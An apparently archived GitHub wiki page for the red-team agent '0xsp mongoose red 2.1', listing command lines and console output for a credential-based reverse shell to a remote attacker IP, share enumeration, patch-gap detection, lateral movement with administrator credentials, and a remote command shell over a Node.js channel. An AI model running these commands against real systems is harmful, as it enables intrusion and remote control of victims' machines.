Skip to content
This repository has been archived by the owner on May 5, 2022. It is now read-only.

0xsp mongoose red version 2.1

Jump to bottom
Lawrence Amer edited this page Jul 25, 2020 · 6 revisions

the newer version comes with different techniques and enhancement, and it is totally remastered from scratch to assist your pen-testing / red teaming operations.

run-as-user windows API weaponization

this feature allows starting a reverse shell directly from the compromised machine using users'account credentials with ability to keep the current session active.

agent.exe -r username password cmd.exe 
[+] trying to Spawn a shell ....!
[*] set RHOST >
remoteattackerip 
[*] set RPORT > 
remote port

local network enumeration and share hunting

actually this feature give am accurate results in some tested environment, about sometimes firewalls will stop it from working, but it is very helpful to retrieve information about locally connected devices and available shares in AD or local network

agent.exe -nds

exploit detection enhancement

a new technique has been added into 0xsp mongoose red 2.1, which will able to detect newer vulnerabilities by communicating into windows update API to assure if there are missing patches.

agent.exe -e 
[!] Loading exploit definitions inspection module
[!] Loading exploit checking engine

also, you can port any results into node js application via the following command

agent.exe -e -o nodejsip -x password

lateral movements

lateral movement is one of the required strategies while doing an assessment, by the agent you will be able to start this attack and execute a desired commands on the system by specifying the address of node js bidirectional communication channel API. for an example if you wanna execute a new process on the targeted system you are attacking, you have to navigate into NodeJs application and choose or type the command you would you like to pass.

agent.exe -lr -host 192.168.14.1 -username administrator -password blabla -srvhost nodejsip

bidirectional shell

a feature of 0xsp mongoose red means for sending commands to and receiving output from a compromised system over the Web service channel.

agent.exe -cmd -srvhost nodejsip -x password

interactive plugin interface

ability to deploy agent plugins into 0xsp plugins online store, agent will communicate through interactive shell option into web application plugin store to deploy a required plugin into the operating system.

agent.exe -interactive 
[!] Starting interactive Console ...
[+] available commands : fetch
[*] plugins cli >
fetch
[*] set SRVRHOST
192.168.80.111
[+] Fetching plugins metadata
Clone this wiki locally